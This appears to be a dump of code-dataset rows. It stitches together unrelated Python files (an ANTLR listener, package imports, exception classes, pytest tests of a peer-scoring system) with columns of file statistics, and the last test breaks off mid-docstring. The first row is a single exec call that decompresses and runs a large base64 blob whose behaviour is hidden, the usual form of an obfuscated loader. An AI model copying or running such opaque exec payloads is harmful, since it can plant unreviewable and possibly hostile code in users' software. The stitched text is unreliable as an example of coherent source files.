exec(zlib.decompress(base64.b64decode("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")))
| 1,773 | 5,299 | 0.964467 | 176 | 5,319 | 29.147727 | 0.982955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15933 | 0.000564 | 5,319 | 2 | 5,300 | 2,659.5 | 0.805681 | 0 | 0 | 0 | 0 | 0.5 | 0.988156 | 0.988156 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
85a1bba6ca1ad44f61aee0988309298800b8e885 | 141 | py | Python | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | 50 | 2017-10-10T15:26:40.000Z | 2022-03-15T11:20:13.000Z | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | null | null | null | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | 7 | 2018-02-02T02:54:13.000Z | 2021-04-24T08:17:45.000Z | from .simple_model import SimpleModel
from .dropout_model import DropoutModel
from .variational_dropout_model import VariationalDropoutModel
| 35.25 | 62 | 0.893617 | 16 | 141 | 7.625 | 0.5625 | 0.270492 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 3 | 63 | 47 | 0.945736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a431d46f6754ed6912f30d9aaad0d6f1cd4fbd3c | 2,981 | py | Python | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 4 | 2021-12-14T19:13:43.000Z | 2022-02-16T13:25:38.000Z | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | null | null | null | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 1 | 2022-01-04T18:35:51.000Z | 2022-01-04T18:35:51.000Z | # Generated from D:/Documents/pycharm_workspace/Qrogue/qrogue/dungeon_editor\QrogueWorld.g4 by ANTLR 4.9.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by QrogueWorldParser.
class QrogueWorldListener(ParseTreeListener):
# Enter a parse tree produced by QrogueWorldParser#start.
def enterStart(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#start.
def exitStart(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#layout.
def enterLayout(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#layout.
def exitLayout(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#l_room_row.
def enterL_room_row(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#l_room_row.
def exitL_room_row(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#l_hallway_row.
def enterL_hallway_row(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#l_hallway_row.
def exitL_hallway_row(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#rooms.
def enterRooms(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#rooms.
def exitRooms(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#room.
def enterRoom(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#room.
def exitRoom(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_attributes.
def enterR_attributes(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_attributes.
def exitR_attributes(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_visibility.
def enterR_visibility(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_visibility.
def exitR_visibility(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_type.
def enterR_type(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_type.
def exitR_type(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#hallways.
def enterHallways(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#hallways.
def exitHallways(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#hallway.
def enterHallway(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#hallway.
def exitHallway(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#h_attributes.
def enterH_attributes(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#h_attributes.
def exitH_attributes(self, ctx):
pass
| 25.921739 | 106 | 0.690708 | 380 | 2,981 | 5.328947 | 0.178947 | 0.074074 | 0.123457 | 0.222222 | 0.788148 | 0.777284 | 0.759012 | 0.756543 | 0.685926 | 0.639506 | 0 | 0.002228 | 0.247232 | 2,981 | 114 | 107 | 26.149123 | 0.900178 | 0.529688 | 0 | 0.48 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.48 | false | 0.48 | 0.02 | 0 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
8ef74b49c1359e9afa39cf7c335873167d27aeb5 | 200 | py | Python | py2df/constants/__init__.py | PgBiel/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | 1 | 2021-06-02T00:07:28.000Z | 2021-06-02T00:07:28.000Z | py2df/constants/__init__.py | jmyrick02/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | null | null | null | py2df/constants/__init__.py | jmyrick02/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | null | null | null | """Constant values for the library, preventing the use of 'magic numbers' and whatnot."""
from .num_consts import *
from .str_consts import *
from .regex_consts import *
from .utility_consts import *
| 33.333333 | 89 | 0.765 | 29 | 200 | 5.137931 | 0.655172 | 0.322148 | 0.322148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145 | 200 | 5 | 90 | 40 | 0.871345 | 0.415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f135ad70b60c64d3b0fa7746efd34fcd1fea0888 | 919 | py | Python | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/ProjectStore | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | 1 | 2021-10-10T13:26:44.000Z | 2021-10-10T13:26:44.000Z | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/Store | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | null | null | null | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/Store | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Union
class DatabaseError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class NotFoundError(Exception):
detail: str = None
def __init__(self, message: Union[Dict[str, Any], str]) -> None:
self.detail = message
super().__init__(message)
class InvalidCredentialError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class NotAuthorizedError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class DataValidationError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
| 21.880952 | 68 | 0.645267 | 100 | 919 | 5.53 | 0.21 | 0.126582 | 0.162749 | 0.198915 | 0.759494 | 0.759494 | 0.759494 | 0.759494 | 0.687161 | 0.605787 | 0 | 0 | 0.242655 | 919 | 41 | 69 | 22.414634 | 0.79454 | 0 | 0 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.038462 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
74b3a4d20b333b0b997b5728318a90404f721bc4 | 14,563 | py | Python | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | 3 | 2020-03-11T19:42:48.000Z | 2021-04-01T21:09:05.000Z | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | null | null | null | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | null | null | null | """
This module tests the scoring system for neighbors to contribute. Score changes happen in
receive_order_internal() and store_orders(), but it is difficult to cover all cases when
tests of these two functions are focused on other perspectives.
So we decided to have an individual test function for the score updates.
"""
import pytest
from message import Order
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_order,
create_a_test_peer,
)
def always_store_orders(peer):
"""
This is a fake function for store_or_discard_orders(), and it always store orders.
"""
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
orderinfo.storage_decision = True
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_penalty_a(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for penalty_a
"""
# Setting for this case:
# Order does not pass should_accept_internal_order()
# Order rejected since it doesn't pass should_accept_internal_order() (penalty_a).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# clear score sheet for neighbors
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Order cannot be accepted to the pending list
def never_accept_internal_order(_receiver, _sender, _order):
return False
monkeypatch.setattr(
engine, "should_accept_internal_order", never_accept_internal_order
)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == -13
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_a(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_a
"""
# Setting for this case:
# my_peer's initial status:
# Local storage: there is an Order instance from the same neighbor
# Behavior: neighbor sends order to my_peer
# Result: Order rejected since there's a duplicate in local storage from the same neighbor (
# reward_a).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(neighbor, order)
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 2
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_b(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_b
"""
# Setting for this case:
# my_peer's initial status:
# Local storage: there is an Order instance from the competitor.
# Behavior: neighbor sends order to my_peer
# Result: Order rejected since there's a duplicate in local storage from competitor \(
# reward_b).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# Always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 3
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_penalty_b(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for penalty_b
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is an Order instance from the same neighbor
# Behavior: neighbor sends order to my_peer
# Result: The second copy rejected since there's a duplicate in pending table from the same
# neighbor (penalty_b); however, the first version will be stored finally (reward_d)
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(neighbor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# Always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == -10
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_c(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_c
"""
# Setting for this case:
# Order passes should_accept_internal_order() but storage_decision is False
# Order accepted to pending table, rejected to storage, and gets reward_c
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# clear score sheet for neighbors
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as False for any orderinfo.
def never_store_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
orderinfo.storage_decision = False
monkeypatch.setattr(engine, "store_or_discard_orders", never_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 5
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_d(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_d
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is a pending orderinfo instance from the competitor.
# Behavior: neighbor sends order to my_peer
# Result: Order from neighbor stored since neighbor won over competitor (reward_d).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as True for orderinfo from neighbor and False
# from competitor.
def fake_store_or_discard_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
if orderinfo.prev_owner == neighbor:
orderinfo.storage_decision = True
else:
orderinfo.storage_decision = False
monkeypatch.setattr(engine, "store_or_discard_orders", fake_store_or_discard_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 7
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_e(scenario, engine, monkeypatch) -> None:
"""
